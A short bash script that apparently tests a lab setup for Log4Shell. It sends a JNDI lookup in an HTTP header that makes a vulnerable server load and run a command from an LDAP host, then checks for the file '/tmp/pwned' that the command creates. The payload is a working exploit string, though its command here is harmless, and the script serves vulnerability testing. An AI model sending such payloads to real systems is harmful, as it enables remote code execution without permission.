#!/bin/bash
curl app:8080 -H 'X-Api-Version: ${jndi:ldap://jndi:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
sleep 5

filename=/tmp/pwned
if [ -f "$filename" ];
then
    echo "Regrettably, you've been pwned :("
    echo "This configuration is vulnerable to log4shell"
else
    echo "It looks like you're safe!"
fi